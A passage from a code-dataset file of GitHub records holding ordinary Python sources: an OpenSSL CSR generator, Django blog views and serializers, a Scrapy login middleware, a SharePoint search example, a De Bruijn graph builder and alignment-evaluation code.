The method then calls update_config_file() with its given parameters.\n\n Argumemnts:\n csr_info (dict): Information required for Certificate Signing Request.\n config_file_path (str): Config file path.\n \"\"\"\n config_file_template = \"\"\"[req]\nprompt = no\ndistinguished_name = req_distinguished_name\nreq_extensions = req_ext\n\n[req_distinguished_name]\nCN={commonName}\nC={country}\nO={organization}\nemailAddress={emailAddress}\n{organizationalUnits}\n\n[req_ext]\nsubjectAltName = @alt_names\n\n[alt_names]\n{altNames}\n\"\"\"\n try:\n with open(config_file_path, \"w\") as f:\n f.write(config_file_template)\n except PermissionError as e:\n logging.error(f\"Permission for writing denied: {config_file_path}\")\n exit(1)\n logging.info(f\"Successfully created config file: {config_file_path}\")\n\n update_config_file(csr_info, config_file_path, config_file_path)\n\n\ndef update_config_file(csr_info: dict, input_config_path: str, output_config_path: str):\n \"\"\"\n Update a config file based on the given Certificate Signing Request information.\n\n Arguments:\n csr_info (dict): Information required for Certificate Signing Request.\n This dictionary should have the following keys:\n \"commonName\" (str): The common name of the certificate.\n \"country\" (str): The country of the certificate.\n \"organization\" (str): The organization name of the certificate.\n \"emailAddress\" (str): The email address of the certificate.\n \"organizationalUnits\" (list): A list of organizational unit strings.\n \"alt_names\" (dict): A dictionary of alternative names for the certificate, where the key is the name type (e.g. \"DNS\") and the value is a list of alternative names. \n input_config_path (str): Path of the config file template.\n output_config_path (str): Path where the config file will be saved.\n\n Raises:\n KeyError: When the config file template is missing an key.\n PermissionError: When the config file is missing the write permission.\n\n Logs:\n logging.error: Missing key in config file.\n logging.error: Missing write permission.\n logging.info: Information about the updated config file.\n \"\"\"\n with open(input_config_path, \"r\") as f:\n config_file_template = f.read()\n\n try:\n config_file_content = config_file_template.format(\n commonName=csr_info[\"commonName\"],\n country=csr_info[\"country\"],\n organization=csr_info[\"organization\"],\n emailAddress=csr_info[\"emailAddress\"],\n organizationalUnits=get_organizationalUnits(csr_info[\"organizationalUnits\"]),\n altNames=get_altNames(csr_info[\"altNames\"])\n )\n except KeyError as e:\n logging.error(f\"The key {e} is missing in the config file\")\n exit(1)\n\n try:\n with open(output_config_path, \"w\") as f:\n f.write(config_file_content)\n except PermissionError as e:\n logging.error(f\"Permission for writing denied: {output_config_path}\")\n exit(1)\n\n logging.info(f\"Successfully updated config file: {output_config_path}\")\n\n\ndef get_altNames(altNames: dict) -> str:\n \"\"\"\n Get altNames in config file format.\n\n Arguments:\n altNames (dict): Dictorary of the altNames.\n\n Returns:\n altNames (list): altNames in config file format.\n \"\"\"\n return \"\\n\".join(f\"{alt_name_type}.{index}={alt_name}\" for alt_name_type, alt_names in altNames.items() for index, alt_name in enumerate(alt_names, start=1))\n\n\ndef get_organizationalUnits(organizationalUnits: list) -> str:\n \"\"\"\n Get organizationalUnits in config file format.\n\n Arguments:\n organizationalUnits (dict): Dictorary of the organizationalUnits.\n\n 
Returns:\n organizationalUnits (list): organizationalUnits in config file format.\n \"\"\"\n return \"\\n\".join(f\"{index}.OU={unit}\" for index, unit in enumerate(organizationalUnits, start=1))\n\n\ndef get_csr_info(network: str, cluster: dict) -> dict:\n \"\"\"\n Get Certificate Signing Request information.\n\n Arguments:\n network (str): Network name for the commonName.\n cluster (dict): Clsuter information.\n\n Returns:\n csr_info (dict): Certificate Signing Request information.\n \"\"\"\n csr_info = {\n \"commonName\": f\"{cluster.get('dns_alias_human_cluster')}.intern\",\n \"country\": \"\",\n \"organization\": \"\",\n \"emailAddress\": \"\",\n \"organizationalUnits\": [\n \"\",\n \"SSL Server\",\n \"SSL\"\n ],\n \"altNames\": {\n \"DNS\": get_dns_list(network, cluster),\n \"IP\": get_ip_list(cluster)\n }\n }\n return csr_info\n\n\ndef get_dns_list(network: str, cluster: dict) -> list:\n \"\"\"\n Get all DNS information of the network and cluster.\n\n Arguments:\n network (str): Network name.\n cluster (dict): Clsuter information.\n\n Returns:\n dns_list (list): List of all DNS of the network and cluster.\n \"\"\"\n dns_list = [f\"{network}.intern\"] if network else []\n dns_list.extend([f\"{cluster.get('dns_alias_human_cluster')}.intern\"]\n if cluster.get('dns_alias_human_cluster') else [])\n dns_list.extend([f\"{machine.get('dns_alias_human_machine')}.intern\"\n for machine in cluster.get(\"machines\")\n if machine.get(\"dns_alias_human_machine\")]\n if cluster.get(\"machines\") else [])\n return dns_list\n\n\ndef get_ip_list(cluster: dict) -> list:\n \"\"\"\n Get all IP information of the network and cluster.\n\n Arguments:\n network (str): Network name.\n cluster (dict): Clsuter information.\n\n Returns:\n ip_list (list): List of all IP of the network and cluster.\n \"\"\"\n ip_list = [cluster.get(\"ip\")] if cluster.get(\"ip\") else []\n ip_list.extend([machine.get(\"ipv4_address\")\n for machine in cluster.get(\"machines\")\n if machine.get(\"ipv4_address\")]\n if cluster.get(\"machines\") else [])\n return ip_list\n\n\ndef create_signing_request(filename: str, private_key: str, signing_request: str, config: str, digest: str, debug: bool):\n \"\"\"\n Create a signing request using OpenSSL.\n\n Arguments:\n filename (str): The name of the file to generate the signing request.\n private_key (str): Private Key path.\n signing_request (str): Signing Request path.\n config (str): Config file path.\n digest (str): The message digest algorithm to use when generating the signing request.\n debug (bool): A flag indicating whether to display the debug output of the signing request information.\n\n Raises:\n subprocess.CalledProcessError: If there is an error generating the signing request using OpenSSL.\n\n Logs:\n logging.info: Information about the generated signing request.\n logging.exception: Information about any errors encountered while generating the signing request using OpenSSL.\n \"\"\"\n try:\n with subprocess.Popen([\"openssl\", \"req\", \"-new\", \"-key\", private_key, \"-out\", signing_request, f\"-{digest}\", \"-config\", config], stdout=subprocess.PIPE, stderr=subprocess.STDOUT) as proc:\n stdout_output, _ = proc.communicate()\n if proc.returncode != 0:\n raise subprocess.CalledProcessError(proc.returncode, proc.args, stdout_output)\n\n if debug: subprocess.run([\"openssl\", \"req\", \"-text\", \"-noout\", \"-verify\", \"-in\", signing_request, \"-config\", config], check=True)\n logging.info(f\"Signing Request generated: {filename}\")\n except 
subprocess.CalledProcessError as e:\n error = re.sub(r\"(\\r\\n|\\r|\\n)\", \"\", str(e.stdout.decode()))\n logging.error(f\"Error generating Signing Request: {error}\")\n exit(1)\n\n\ndef show_signing_request_infos(network: str, cluster: dict, private_key: str, signing_request: str, config: str):\n \"\"\"\n Print textual representation of the SSL parameters\n\n Arguments:\n network (str): Network name.\n cluster (dict): Cluster information.\n private_key (str): Private Key path.\n signing_request (str): Signing Request path.\n config (str): Config file path.\n \"\"\"\n with open(config, \"r\") as file:\n csr_info = file.read()\n\n print(\"-\" * os.get_terminal_size().columns)\n print(f\"Network: {network}\")\n print(f\"Cluster:\")\n print(json.dumps(cluster, indent=4))\n print(f\"\\nPrivate Key: {private_key}\")\n print(f\"Signing Request: {signing_request}\")\n print(f\"Config: {config}\\n\")\n print(csr_info)\n print(\"-\" * os.get_terminal_size().columns)\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ #\n\n# Utilities -------------------------------------------------------------------------------------------------------------------------------------------- #\ndef handle_directories(output_pk: str, output_sr: str):\n \"\"\"\n Create the necessary directories for the SSL tool\n\n Arguments:\n output_pk (str): The path of the private key directory\n output_sr (str): The path of the signing request directory\n \"\"\"\n create_directory(output_pk)\n create_directory(output_sr)\n create_directory(f\"{output_sr}/config\")\n\n\ndef create_directory(dir_path: str) -> str:\n \"\"\"\n Create a directory at the specified path.\n\n Arguments:\n dir_path (str): The path of the directory to be created.\n\n Returns:\n dir_path (str): The path of the directory that was created.\n\n Raises:\n OSError: If there was an error while creating the directory.\n\n Logs:\n logging.info: Information about the created directory.\n logging.error: Information about any errors encountered while creating the directory.\n \"\"\"\n try:\n os.makedirs(dir_path, exist_ok=True)\n logging.info(f\"Created directory: {dir_path}\")\n return dir_path\n except OSError as e:\n logging.error(f\"Error while creating directory: {e}\")\n exit(1)\n\n\ndef change_permission_to_read_only(path: str):\n \"\"\"\n Change the file permission to read-only.\n\n Arguments:\n path (str): The path of the file whose permission is to be changed.\n\n Logs:\n logging.info: Information about the file whose permission was changed to read-only.\n \"\"\"\n try:\n os.chmod(path, stat.S_IRUSR)\n logging.info(f\"File permission changed to read-only: {path}\")\n except subprocess.CalledProcessError as e:\n logging.error(f\"Error while changing file permission: {e}\")\n exit(1)\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ #\n\n\nif __name__ == \"__main__\":\n # parse input arguments\n args = parse_arguments()\n\n # setup logging\n setup_logging(args.output_log)\n\n # log input arguments\n if args.debug:\n input_args = \" \".join([\"[{}={}]\".format(arg, getattr(args, arg)) for arg in vars(args)])\n logging.debug(f\"Script executed with: {input_args}\")\n\n # run main method\n 
main(args)\n","repo_name":"Knowhere-coding/certiPy","sub_path":"certiPy.py","file_name":"certiPy.py","file_ext":"py","file_size_in_byte":31424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"16540053400","text":"from django.shortcuts import render, get_object_or_404\nfrom django.views.generic import ListView, DetailView\nfrom django.db.models import Q, F\nfrom django.http import JsonResponse\n\nfrom .models import Post, Tag, Category\nfrom comment.models import Comment\nfrom comment.forms import CommentForm\n\n\nclass IndexView(ListView):\n model = Post\n template_name = 'post/index.html'\n context_object_name = 'post_list'\n paginate_by = 5\n\n\nclass CategoryView(IndexView):\n def get_queryset(self):\n cate = get_object_or_404(Category, pk=self.kwargs.get('pk'))\n return super(CategoryView, self).get_queryset().filter(category=cate)\n\n\nclass TagView(IndexView):\n def get_queryset(self):\n tag = get_object_or_404(Tag, pk=self.kwargs.get('pk'))\n return super(TagView, self).get_queryset().filter(tags=tag)\n\n\nclass ArchivesView(IndexView):\n def get_queryset(self):\n return super(ArchivesView, self).get_queryset().filter(pub_time__year=self.kwargs.get('year'),\n pub_time__month=self.kwargs.get('month'))\n\n\nclass PostDetailView(DetailView):\n model = Post\n template_name = 'post/detail.html'\n context_object_name = 'post'\n\n def get(self, request, *args, **kwargs):\n response = super(PostDetailView, self).get(request, *args, **kwargs)\n self.object.increase_views()\n return response\n\n def get_context_data(self, **kwargs):\n context = super(PostDetailView, self).get_context_data(**kwargs)\n post = super(PostDetailView, self).get_object(queryset=None)\n post_list = Post.objects.filter(id__lt=post.id).order_by('-id')\n pre_post = post_list[0] if len(post_list) > 0 else None\n post_list = Post.objects.filter(id__gt=post.id).order_by('-id')\n next_post = post_list[0] if len(post_list) > 0 else None\n comment_list = Comment.objects.filter(post=post, parent=None)\n comment_form = CommentForm(initial={'post_id': post.id, 'parent':0})\n context.update({\n 'comment_list': comment_list,\n 'comment_form': comment_form,\n 'pre_post': pre_post,\n 'next_post': next_post,\n })\n return context\n\n\ndef search(request):\n q = request.GET.get('q')\n if not q:\n error_msg = '请输入关键词'\n return render(request, 'post/index.html', {'error_msg': error_msg})\n post_list = Post.objects.filter(Q(title__icontains=q) | Q(body__icontains=q))\n return render(request, 'post/index.html', {'post_list':post_list})\n\n\ndef increase_likes(request):\n data = {}\n if request.method == 'POST':\n id = request.POST.get('id')\n if not Post.objects.filter(pk=id).exists():\n data['status'] = 'ERROR'\n data['message'] = '文章不存在'\n else:\n Post.objects.filter(pk=id).update(likes=F('likes')+1)\n data['status'] = 'SUCCESS'\n data['message'] = '点赞成功'\n return JsonResponse(data)\n\n\ndef bad_request(request):\n return render(request, '400.html')\n\n\n# def permission_denied(request):\n# return render(request, '403.html')\n\n\ndef page_not_found(request):\n return render(request, '404.html')\n\n\ndef error(request):\n return render(request, '500.html')\n\n # def pagination_data(self, paginator, page, is_paginated):\n # if not is_paginated:\n # return {}\n # left = []\n # right = []\n # left_has_more = []\n # right_has_more = []\n # first = False\n # last = False\n # page_num = page.number\n # total = paginator.num_pages\n #\n # page_range = paginator.page_range\n #\n # if 
page_num == 1:\n # right = page_range[page_num: page_num+2]\n # if right[-1] < total -1:\n # right_has_more = True\n # if right[-1] < total:\n # last = True\n #\n # elif page_num == total:\n # left = page_range[page_num - 3 if page_num - 3 > 0 else page_num-1]\n # if left[0] > 2:\n # left_has_more = True\n # if left[0] > 1:\n # first = True\n # else:\n # left = page_range[(page_num - 3) if (page_num - 3) > 0 else 0:page_num - 1]\n # right = page_range[page_num:page_num + 2]\n # if right[-1] < total- 1:\n # right_has_more = True\n # if right[-1] < total:\n # last = True\n # if left[0] > 2:\n # left_has_more = True\n # if left[0] > 1:\n # first = True\n #\n # data = {\n # 'left': left,\n # 'right': right,\n # 'left_has_more': left_has_more,\n # 'right_has_more': right_has_more,\n # 'first': first,\n # 'last': last,\n # }\n #\n # return data\n","repo_name":"Frankssss/DjangoBlog","sub_path":"apps/post/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13591011914","text":"\"\"\"Calculate Approximate Similarity\n\nUsage:\n better_partition_mitdwh.py \n\"\"\"\n\nimport gc\nimport hashlib\nimport time\n\nfrom docopt import docopt\n\nfrom base_mitdwh import base_mitdwh\nfrom datasketch import BetterWeightedPartitionMinHash\n\n\ndef better_partition_mitdwh(mitdwh_path, filename, hash_func, k):\n base_mitdwh(mitdwh_path, BetterWeightedPartitionMinHash, filename, hash_func, k)\n\n\nif __name__ == '__main__':\n arguments = docopt(__doc__)\n hashes = [(hashlib.sha1, 'sha1')]\n k_vals = [32, 64, 128]\n for k in k_vals:\n for i in range(len(hashes)):\n start_time = time.time()\n better_partition_mitdwh(arguments[''],\n 'better_partition_mitdwh_7/k_{}/{}-{}-data.json'.format(k, k, hashes[i][1]),\n hashes[i][0], k)\n with open('better_partition_mitdwh_7/k_{}/{}-{}-time.txt'.format(k, k, hashes[i][1]), 'w+') as f:\n f.write(\"--- %s seconds ---\" % (time.time() - start_time))\n gc.collect()\n","repo_name":"demitrin/similarity-playground","sub_path":"dataset_simulations/better_partition_mitdwh.py","file_name":"better_partition_mitdwh.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35229156715","text":"from office365.sharepoint.client_context import ClientContext\nfrom tests import test_site_url, test_user_credentials\n\nctx = ClientContext(test_site_url).with_credentials(test_user_credentials)\nresult = ctx.search.query(\"IsDocument:1\", row_limit=10).execute_query()\nfor row in result.value.PrimaryQueryResult.RelevantResults.Table.Rows:\n print(row.Cells[\"Path\"])\n\nprint(\"Next query..\")\n\nresult = ctx.search.query(\"IsDocument:0\", row_limit=5).execute_query()\nfor row in result.value.PrimaryQueryResult.RelevantResults.Table.Rows:\n print(row.Cells[\"Path\"])\n","repo_name":"Maddisan/Office365-REST-Python-Client","sub_path":"examples/sharepoint/search/search_simple.py","file_name":"search_simple.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"18558424959","text":"import random\nfrom twisted.internet.defer import maybeDeferred\nfrom scrapy.http import Request, Response\nfrom scrapy import log, signals\nfrom scrapy.exceptions import IgnoreRequest\n\n\ndef to_callback(string_or_method_, obj):\n if string_or_method_ is None:\n method = lambda *args, **kwargs: None\n elif 
isinstance(string_or_method_, basestring):\n method = getattr(obj, string_or_method_)\n else:\n method = string_or_method_\n return method\n\n\nclass LoginError(Exception):\n pass\n\n\nclass LoginMiddleware(object):\n\n @classmethod\n def from_crawler(cls, crawler):\n return cls(crawler)\n\n def __init__(self, crawler):\n self.crawler = crawler\n self.queue = []\n self.paused = False\n self.fail_if_not_logged_in = crawler.settings.get(\n 'LOGIN_FAIL_IF_NOT_LOGGED_IN', True\n )\n self.max_attemps = crawler.settings.getint('LOGIN_MAX_ATTEMPS', 10)\n self.attemp = 0\n self.debug = crawler.settings.get('LOGIN_DEBUG', False)\n crawler.signals.connect(self.spider_idle,\n signal=signals.spider_idle)\n\n def process_request(self, request, spider):\n if request.meta.get('captcha_request', False):\n return\n if request.meta.get('login_request', False):\n return\n if not request.meta.get('login_final_request', False):\n self._enqueue_if_paused(request, spider)\n\n def process_response(self, request, response, spider):\n if request.meta.get('login_request', False):\n return response\n if request.meta.get('captcha_request', False):\n return response\n if not request.meta.get('login_final_request', False):\n self._enqueue_if_paused(request, spider)\n max_attemps = getattr(spider, 'login_max_attemps', self.max_attemps)\n if max_attemps > 0 and self.attemp > max_attemps:\n raise IgnoreRequest('Max login attemps exceeded')\n self.do_login = getattr(spider, 'do_login', None)\n self.check_login = getattr(spider, 'check_login', None)\n self.accounts = getattr(spider, 'accounts', None)\n self.username = getattr(spider, 'username', None)\n self.password = getattr(spider, 'password', None)\n login_callback = getattr(spider, 'login_callback', None)\n self.login_callback = to_callback(login_callback, spider)\n self.dont_resume = getattr(\n spider, 'login_dont_resume', False\n )\n if self.dont_resume and login_callback is None:\n spider.log('You should set login_callback if '\n 'login_dont_resume is set to True, '\n 'otherwise no request is made after login',\n level=log.WARNING)\n self.spider = spider\n\n if not all((self.check_login, self.do_login,\n self.accounts or self.username and self.password)):\n return response\n # Determine login status\n try:\n login_status = self.check_login(response)\n except LoginError as exc:\n login_successful = False\n login_message = exc.message\n else:\n login_successful = bool(login_status)\n login_message = None\n\n if login_successful:\n if self.attemp > 0:\n spider.log('Logged in', level=log.INFO)\n self._resume_crawling()\n self.attemp = 0\n return response\n else:\n self._pause_crawling()\n self._enqueue(request, spider)\n if not self.username or not self.password:\n self.username, self.password = random.choice(self.accounts)\n if login_message:\n spider.log('Not logged in: {}'.format(login_message),\n level=log.WARNING)\n else:\n spider.log('Not logged in', level=log.WARNING)\n self.attemp += 1\n if max_attemps > 0 and self.attemp > max_attemps:\n spider.log('Max login attemps exceeded', level=log.ERROR)\n raise IgnoreRequest('Max login attemps exceeded')\n spider.log('Logging in (attemp {}/{})'\n .format(self.attemp, max_attemps),\n level=log.INFO)\n dfd = maybeDeferred(self.do_login, response, self.username,\n self.password)\n dfd.addCallbacks(self.deffered_login_callback,\n self.deffered_login_errback)\n raise IgnoreRequest()\n\n def deffered_login_callback(self, result):\n if isinstance(result, Request):\n result.callback = self.login_callback\n result.dont_filter = 
True\n result.meta['login_final_request'] = True\n self.crawler.engine.crawl(result, self.spider)\n elif isinstance(result, Response):\n pass\n else:\n raise RuntimeError('Deferred has been resolved as non-Request: {}'\n .format(type(result)))\n\n def deffered_login_errback(self, failure):\n self.spider.log('Login failed: {}'.format(failure.getErrorMessage()))\n self._resume_crawling()\n\n def spider_idle(self, spider):\n self._resume_crawling(force=True)\n\n def _pause_crawling(self):\n self.paused = True\n\n def _resume_crawling(self, force=False):\n if not self.paused:\n return\n self.paused = False\n if self.dont_resume and not force:\n self.spider.log('Not resuming crawl')\n elif self.queue:\n self.spider.log('Resuming crawl: {}'.format(self.queue),\n level=log.DEBUG)\n for request, spider in self.queue:\n request.dont_filter = True\n self.crawler.engine.crawl(request, spider)\n\n self.queue[:] = []\n\n def _enqueue_if_paused(self, request, spider):\n if self.paused:\n self._enqueue(request, spider)\n raise IgnoreRequest('Crawling paused, because login takes place')\n\n def _enqueue(self, request, spider):\n self.queue.append((request, spider))\n","repo_name":"TeamHG-Memex/scrapy-login","sub_path":"scrapy_login/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6196,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"10352020573","text":"from src.scrapped_data_decoders.decoder import Decoder\nfrom src.scrapped_data_decoders.utils import get_with_default\nfrom collections import defaultdict\n\nclass MainInPeopleDecoder(Decoder):\n def __init__(self):\n self.id2value = defaultdict(lambda: \"Unknown\")\n self.id2value.update({\n 1: \"Intelligence and Creativity\",\n 2: \"Kindness and Honesty\",\n 3: \"Beauty and Health\",\n 4: \"Authority and Wealth\",\n 5: \"Courage and Perseverance\",\n 6: \"Humor and Zest\",\n })\n \n def decode(self, user_dict: dict) -> dict[str, int|str]:\n id = get_with_default(user_dict, ['personal', 'people_main'], default=0)\n value = self.id2value[id]\n return {'people_main_id': id, 'people_main_value': value}\n\n","repo_name":"implausibleDeniability/thesis","sub_path":"src/scrapped_data_decoders/main_in_people_decoder.py","file_name":"main_in_people_decoder.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8721030534","text":"from rest_framework import serializers\nfrom .models import Notification, User, Food, Order, OrderItem, Address, Payment, Review, Cart, CartItem, Category, FoodImage\n\nimport re\nemail_pattern = re.compile(r\"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)\")\n\nclass LoginSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ['email', 'password']\n\nclass RegisterSerializer(serializers.ModelSerializer):\n password=serializers.CharField(max_length=32,min_length=8,write_only = True)\n\n class Meta:\n model = User\n fields = ['name', 'email', 'password', 'phone', 'type_of_user']\n\n def validate(self,attrs):\n email = attrs.get('email',' ')\n\n if not email_pattern.match(email):\n raise serializers.ValidationError('Please enter a valid email!')\n return attrs\n\n def create(self,validated_data):\n validated_data['is_active'] = True\n return User.objects.create_user(**validated_data)\n\nclass ForgotPasswordSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ['email']\n\nclass 
CategorySerializer(serializers.ModelSerializer):\n class Meta:\n model = Category\n fields = '__all__'\n\nclass AddressSerializer(serializers.ModelSerializer):\n class Meta:\n model = Address\n fields = '__all__'\n\nclass FoodImageSerializer(serializers.ModelSerializer):\n class Meta:\n model = FoodImage\n fields = '__all__'\n\nclass FoodViewSerializer(serializers.ModelSerializer):\n category = CategorySerializer(read_only=True)\n user = RegisterSerializer(read_only=True)\n #food_image = FoodImageSerializer(many=True, required=False)\n restaurant = AddressSerializer(read_only=True)\n food_image = serializers.SerializerMethodField()\n\n def get_food_image(self, obj):\n #data = {...} # your logic\n food_images = FoodImage.objects.filter(food=obj)\n if food_images:\n field_serializer = FoodImageSerializer(food_images.first())\n return field_serializer.data\n\n class Meta:\n model = Food\n fields = ['id', 'name', 'age', 'description', 'price', 'category', 'user', 'quantity', 'is_available','is_verified', 'restaurant','food_image']\n\nclass FoodSerializer(serializers.ModelSerializer):\n #category = CategorySerializer(read_only=True)\n #user = RegisterSerializer(read_only=True)\n #food_image = FoodImageSerializer(many=True, required=False)\n #food_image = serializers.FileField()\n #restaurant = AddressSerializer(read_only=True)\n class Meta:\n model = Food\n fields = ['id', 'name', 'age', 'description', 'price', 'category', 'user', 'quantity', 'is_available','is_verified', 'restaurant']\n\n def create(self, validated_data):\n # category_data = validated_data.pop('category')\n # #user_data = validated_data.pop('user')\n #food_image_data = validated_data.pop('food_image', None)\n # #restaurant_data = validated_data.pop('restaurant')\n # category,k = Category.objects.get_or_create(**category_data)\n # #user = User.objects.get_or_create(**user_data)\n # #restaurant = Address.objects.get_or_create(**restaurant_data)\n food = Food.objects.create(**validated_data)\n #if food_image_data:\n #if len(food_image_data) == 1:\n #FoodImage.objects.create(food=food, image=food_image_data)\n #else:\n #for image in food_image_data:\n #FoodImage.objects.create(food=food, image=image)\n return food\n\nclass OrderSerializer(serializers.ModelSerializer):\n class Meta:\n model = Order\n fields = '__all__'\n\nclass OrderItemSerializer(serializers.ModelSerializer):\n food = FoodSerializer(read_only=True)\n class Meta:\n model = OrderItem\n fields = '__all__'\n\nclass PaymentSerializer(serializers.ModelSerializer):\n class Meta:\n model = Payment\n fields = '__all__'\n\nclass ReviewSerializer(serializers.ModelSerializer):\n class Meta:\n model = Review\n fields = '__all__'\n\nclass CartSerializer(serializers.ModelSerializer):\n class Meta:\n model = Cart\n fields = '__all__'\n\nclass CartItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = CartItem\n fields = '__all__'\n\nclass CartItemViewSerializer(serializers.ModelSerializer):\n food = FoodViewSerializer(read_only=True)\n class Meta:\n model = CartItem\n fields = '__all__'\n\nclass NotificationSerializer(serializers.ModelSerializer):\n class Meta:\n model = Notification\n fields = '__all__'","repo_name":"Jenil-Savla/Surplus-Food","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36588176858","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 5 21:07:29 2018\r\n\r\n@author: 
njayj\r\n\"\"\"\r\n#TAATGCCATGGGATGTT\r\ndef debruijn(str, k):\r\n edges = []\r\n nodes = set()\r\n for i in range(len(str)-k+1):\r\n edges.append((str[i:i+k-1], str[i+1:i+k]))\r\n nodes.add(str[i:i+k-1])\r\n nodes.add(str[i+1:i+k])\r\n return nodes, edges\r\n\r\n#nodes, edges = debruijn(\"ACGCGTCG\", 3)\r\n\r\n# =============================================================================\r\n# def visualize_de_bruijn(st, k):\r\n# \"\"\" Visualize a directed multigraph using graphviz \"\"\"\r\n# nodes, edges = debruijn(st, k)\r\n# dot_str = 'digraph \"DeBruijn graph\" {\\n'\r\n# for node in nodes:\r\n# dot_str += ' %s [label=\"%s\"] ;\\n' % (node, node)\r\n# for src, dst in edges:\r\n# dot_str += ' %s -> %s ;\\n' % (src, dst)\r\n# return dot_str + '}\\n'\r\n# =============================================================================\r\n\r\ndef visualize_de_bruijn(st, k):\r\n \"\"\" Visualize a directed multigraph using graphviz \"\"\"\r\n nodes, edges = debruijn(st, k)\r\n dot_str = 'digraph \"DeBruijn graph\" {'\r\n for node in nodes:\r\n dot_str += ' %s [label=\"%s\"] ;' % (node, node)\r\n for src, dst in edges:\r\n dot_str += ' %s -> %s ;' % (src, dst)\r\n return dot_str + '}'","repo_name":"grasshopper314159/BioinformaticsA1","sub_path":"debruijn.py","file_name":"debruijn.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2747533295","text":"from __future__ import division\nfrom operator import itemgetter\n\n\ndef evaluate(options, testalign, goldalign, log_function):\n goldalign = [(tuple(src),tuple(target)) for src,target in goldalign]\n \n results = {}\n paircounts = {}\n for pair in [(len(srclist),len(targetlist)) for srclist,targetlist in goldalign]:\n paircounts[pair] = paircounts.get(pair,0) + 1\n pairs_normalized = {}\n for pair in paircounts:\n pairs_normalized[pair] = (paircounts[pair],paircounts[pair] / float(len(goldalign)))\n \n log_function('\\ngold alignment frequencies\\n')\n for aligntype,(abscount,relcount) in sorted(list(pairs_normalized.items()),key=itemgetter(1),reverse=True):\n log_function(aligntype,end='')\n log_function(' - ',end='')\n log_function(abscount,end='')\n log_function(' ('+str(relcount)+')')\n \n log_function('\\ntotal recall: ',end='')\n log_function(str(len(goldalign)) + ' pairs in gold')\n (tpstrict,fnstrict,tplax,fnlax) = recall((0,0),goldalign,[i[0] for i in testalign],log_function)\n results['recall'] = (tpstrict,fnstrict,tplax,fnlax)\n\n for aligntype in set([i[1] for i in testalign]):\n testalign_bytype = []\n for i in testalign:\n if i[1] == aligntype:\n testalign_bytype.append(i)\n log_function('precision for alignment type ' + str(aligntype) + ' ( ' + str(len(testalign_bytype)) + ' alignment pairs)')\n precision(goldalign,testalign_bytype,log_function)\n\n log_function('\\ntotal precision:',end='')\n log_function(str(len(testalign)) + ' alignment pairs found')\n (tpstrict,fpstrict,tplax,fplax) = precision(goldalign,testalign,log_function)\n results['precision'] = (tpstrict,fpstrict,tplax,fplax)\n\n return results\n\n\ndef precision(goldalign, testalign, log_function):\n tpstrict=0\n tplax=0\n fpstrict=0\n fplax=0\n for (src,target) in [i[0] for i in testalign]:\n if (src,target) == ((),()):\n continue\n if (src,target) in goldalign:\n tpstrict +=1\n tplax += 1\n else:\n srcset, targetset = set(src), set(target)\n for srclist,targetlist in goldalign:\n #lax condition: hypothesis and gold alignment only need to overlap\n if 
srcset.intersection(set(srclist)) and targetset.intersection(set(targetlist)):\n fpstrict +=1\n tplax += 1\n break\n else:\n fpstrict +=1\n fplax +=1\n log_function('false positive: ',2)\n log_function((src,target),2)\n if tpstrict+fpstrict > 0:\n log_function('precision strict: ',end='')\n log_function((tpstrict/float(tpstrict+fpstrict)))\n log_function('precision lax: ',end='')\n log_function((tplax/float(tplax+fplax)))\n log_function('')\n else:\n log_function('nothing to find')\n\n return tpstrict,fpstrict,tplax,fplax\n\n\ndef recall(aligntype, goldalign, testalign, log_function):\n\n srclen,targetlen = aligntype\n\n if srclen == 0 and targetlen == 0:\n gapdists = [(0,0) for i in goldalign]\n elif srclen == 0 or targetlen == 0:\n log_function('nothing to find')\n return\n else:\n gapdists = [(len(srclist),len(targetlist)) for srclist,targetlist in goldalign]\n\n tpstrict=0\n tplax=0\n fnstrict=0\n fnlax=0\n for i,pair in enumerate(gapdists):\n if aligntype == pair:\n (srclist,targetlist) = goldalign[i]\n if not srclist or not targetlist:\n continue\n elif (srclist,targetlist) in testalign:\n tpstrict +=1\n tplax +=1\n else:\n srcset, targetset = set(srclist), set(targetlist)\n for src,target in testalign:\n #lax condition: hypothesis and gold alignment only need to overlap\n if srcset.intersection(set(src)) and targetset.intersection(set(target)):\n tplax +=1\n fnstrict+=1\n break\n else:\n fnstrict+=1\n fnlax+=1\n log_function('not found: ',2),\n log_function(goldalign[i],2)\n\n if tpstrict+fnstrict>0:\n log_function('recall strict: '),\n log_function((tpstrict/float(tpstrict+fnstrict)))\n log_function('recall lax: '),\n log_function((tplax/float(tplax+fnlax)))\n log_function('')\n else:\n log_function('nothing to find')\n\n return tpstrict,fnstrict,tplax,fnlax\n\n\ndef finalevaluation(results, log_function):\n recall_value = [0,0,0,0]\n precision_value = [0,0,0,0]\n for i,k in list(results.items()):\n for m,j in enumerate(recall_value):\n recall_value[m] = j+ k['recall'][m]\n for m,j in enumerate(precision_value):\n precision_value[m] = j+ k['precision'][m]\n\n try:\n pstrict = 